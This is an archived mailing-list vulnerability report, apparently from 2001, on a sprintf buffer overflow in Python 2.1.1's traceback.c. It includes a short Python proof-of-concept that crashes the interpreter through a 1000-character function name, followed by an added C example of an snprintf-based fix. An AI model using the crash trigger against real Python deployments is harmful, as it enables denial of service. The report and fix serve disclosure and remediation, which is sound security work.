Hi,

I've found a buffer overflow in the Python 2.1.1 source code. (Maybe there are many others.) The buffer overflow is in the file traceback.c in the directory Python of the Python source code. Simply put, there's a sprintf done in this way:

    sprintf(linebuf, FMT, filename, lineno, name)

What causes the overflow is the name parameter, which could be > 1000 (the linebuf size).

Alex Martelli <aleaxat_private> has submitted the bug on sourceforge as 485175, and produced the following script to demonstrate the overflow:

    #!/usr/local/bin/python
    # Write a module whose single function has a 1000-character name
    name = 'prova'*200
    fou = open('fatto.py','w')
    print>>fou, 'def',
    print>>fou, name,
    print>>fou, '():'
    print>>fou, '    return 1/0'
    fou.close()

    import fatto
    print 'prima (%d)'%len(name)
    funz = getattr(fatto, name)
    try:
        # Raising ZeroDivisionError makes the interpreter print the
        # traceback line, which is where the overflow happens
        funz()
    except:
        print 'beccato'
        raise

which causes a segmentation fault in the Python interpreter.

That bug is still present in Python 2.0.

Cheers,
deneb.
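The fix for this class of bug is to format into the fixed-size buffer with a length-bounded call and to check whether the output was cut. The example below is added here and is not code from Python's traceback.c; it keeps the 1000-byte buffer the report mentions but uses snprintf instead of sprintf. The format string FMT is an assumption (the report does not show Python's actual one), and make_long_name just rebuilds the 'prova'*200 name from the script above so the overflow case can be exercised without crashing.

```c
#include <stdio.h>
#include <string.h>

/* Same buffer size the report gives for linebuf in traceback.c. */
#define LINEBUF_SIZE 1000

/* Assumed format string for a traceback line; Python's real FMT may differ. */
#define FMT "  File \"%s\", line %d, in %s\n"

/*
 * Hardened replacement for the sprintf(linebuf, FMT, filename, lineno, name)
 * call described in the report. snprintf never writes past linebuf[size-1]
 * and always NUL-terminates (for size > 0). Its return value is the length
 * the full output would have had, so comparing it with size tells us
 * whether the line was truncated.
 *
 * Returns 1 if the whole line fit, 0 if it was truncated or formatting failed.
 */
int format_traceback_line(char *linebuf, size_t size,
                          const char *filename, int lineno, const char *name)
{
    int n;
    if (size == 0)
        return 0;
    n = snprintf(linebuf, size, FMT, filename, lineno, name);
    if (n < 0) {
        linebuf[0] = '\0';          /* encoding error: leave an empty, valid string */
        return 0;
    }
    return (size_t)n < size;        /* n >= size means the output was cut */
}

/*
 * Rebuild the 1000-character function name from the report's script
 * ('prova' repeated 200 times). out must hold at least 1001 bytes;
 * the result is always NUL-terminated and never exceeds size-1 chars.
 */
void make_long_name(char *out, size_t size)
{
    const char *piece = "prova";
    size_t len = 0;
    int i;
    if (size == 0)
        return;
    out[0] = '\0';
    for (i = 0; i < 200; i++) {
        size_t plen = strlen(piece);
        if (len + plen >= size)
            break;                  /* stop rather than overrun the caller's buffer */
        memcpy(out + len, piece, plen);
        len += plen;
        out[len] = '\0';
    }
}

int main(void)
{
    char linebuf[LINEBUF_SIZE];
    char name[1001];

    /* Short name: everything fits. */
    if (format_traceback_line(linebuf, sizeof linebuf, "fatto.py", 1, "f"))
        printf("ok, %zu bytes\n", strlen(linebuf));

    /* The 1000-character name from the report: the line no longer fits,
     * but instead of smashing the stack we get a truncated, terminated line. */
    make_long_name(name, sizeof name);
    if (!format_traceback_line(linebuf, sizeof linebuf, "fatto.py", 1, name))
        printf("truncated to %zu bytes (name was %zu chars)\n",
               strlen(linebuf), strlen(name));
    return 0;
}
```

The truncation check matters in practice: a caller that silently drops the tail of a traceback line still behaves correctly memory-wise, but if it needs the full function name (for example to match it against something) it should know the line was cut and fall back to a heap-allocated buffer sized from the snprintf return value.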
This archive was generated by hypermail 2b30 : Sun Nov 25 2001 - 09:05:03 PST